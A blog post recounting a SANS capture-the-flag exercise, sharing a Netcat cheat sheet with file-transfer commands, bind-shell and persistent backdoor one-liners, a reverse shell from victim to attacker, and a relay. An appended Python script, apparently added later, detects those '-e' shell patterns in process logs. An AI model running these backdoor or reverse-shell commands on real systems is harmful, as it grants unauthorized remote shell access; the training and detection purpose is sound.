All the networking you could need: Netcat
So my SANS course this past week culminated today with a nice game of capture the flag. While not Defcon caliber, it ended up being quite a lot of fun, especially for a game that could only last six hours, and did a fantastic job of bringing the course together. We learned a lot of tools during the class, and playing a scenario-based CTF brought it all together, as many of them were used during the game. Mostly we focused on the old favorites: Nmap, Nessus, John the Ripper; the kinda tools that have been around forever, and for good reason.
We focused mainly on another tool, one I'd known but used little. Called the "network swiss-army knife", Netcat proved, as we were promised by Ed, the most useful tool of the whole course. Netcat does just about everything. Yes, I know, if you've been in networking or security for any amount of time you're asking how I'd missed that. I hadn't, but practical use is something else. There's no doubt it's one of the most useful tools a network admin, security engineer, or hacker could ever want. So just for general consumption, and for myself, I'm posting the cheat sheet I used during our class CTF competition (my team came in 3rd of around 50 in case you were wondering) just to get any other Netcat neophytes started and possibly remind some old hands of some fun tricks:
Data Transfer (Pull):
server: nc -l -p [port] < [filename]
client: nc [server ip] [server port] > [filename]
Data Transfer (Push):
server: nc -l -p [port] > [filename]
client: nc [server ip] [server port] < [filename]
Backdoors:
unix: nc -l -p [port] -e /bin/sh
windows: nc -l -p [port] -e cmd.exe
Persistent Backdoor:
while [ 1 ]; do nc -l -p [port] -e /bin/sh; done
Reverse Shell:
server (attacker): nc -l -p [port]
client (victim): nc [server ip] [server port] -e [shell]
Backdoor Client:
nc [server ip] [port]
Traffic Relay on Linux:
mknod backpipe p
nc -l -p [incoming port] 0<backpipe | nc [target ip] [target port] 1>backpipe
Traffic Replay:
nc [targetip] [port] < [filename]
A special thanks to David "The Canadian Invasion" and Josh (it's a d, not an 8); great team fellas, it was a pleasure.
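The same cheat sheet from the defender's side, as an added example that is not part of the original post: a classifier that reads process-creation command lines and flags the -e listener and -e client patterns listed above, where a repeated identical hit is what the persistent loop leaves behind. The record format, sample lines and function names are constructed for illustration; the option letters that take a value are those of traditional netcat (nc 1.10).

```python
import shlex
from collections import Counter
from pathlib import PureWindowsPath  # handles / and \ separators

NC_NAMES = {"nc", "netcat", "ncat", "nc.traditional", "nc.exe", "ncat.exe"}
TAKES_ARG = set("egGiopsw")  # nc 1.10 option letters that consume a value

def classify_nc(cmdline):
    """Label a netcat command line; return None when it is not netcat."""
    try:
        argv = shlex.split(cmdline, posix=False)  # keep Windows backslashes
    except ValueError:                            # unbalanced quotes
        return None
    if not argv or PureWindowsPath(argv[0].strip("\"'")).name.lower() not in NC_NAMES:
        return None
    listen, exec_prog, args = False, None, iter(argv[1:])
    for tok in args:
        if len(tok) < 2 or tok[0] != "-" or tok[1] == "-":
            continue                              # positional or long option
        for i, c in enumerate(tok[1:], start=1):  # getopt-style cluster: -lvp
            if c == "l":
                listen = True
            elif c in TAKES_ARG:                  # value is attached or next
                value = tok[i + 1:] or next(args, "")
                exec_prog = value if c == "e" else exec_prog
                break
    if exec_prog is not None:                     # -e hands the socket a program
        return "bind-shell" if listen else "reverse-shell"
    return "listener" if listen else "client"

def scan(records):
    """Count -e hits per (host, label, command line) in tab-separated records."""
    hits = Counter()
    for rec in records:
        _ts, host, cmdline = rec.split("\t", 2)
        label = classify_nc(cmdline)
        if label in ("bind-shell", "reverse-shell"):
            hits[(host, label, cmdline)] += 1
    return hits

# Constructed process-creation records: time <TAB> host <TAB> command line.
SAMPLE = [
    "10:01:07\tweb01\tnc -l -p 4444 -e /bin/sh",
    "10:01:09\tweb01\tnc -l -p 4444 -e /bin/sh",
    "10:02:30\tws17\tC:\\tools\\nc.exe 192.0.2.10 443 -e cmd.exe",
    "10:03:00\tweb01\t/usr/bin/nc -lvp 9000",
]
if __name__ == "__main__":
    print(*scan(SAMPLE).items(), sep="\n")
```

Matching on the binary name only catches copies that keep a netcat name, so treat this as one signal alongside listener and parent-process telemetry.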


2 comments:
Very nice. Copied and pasted to a Sticky right next to my vi cheat sheet.
Nice list! Thanks!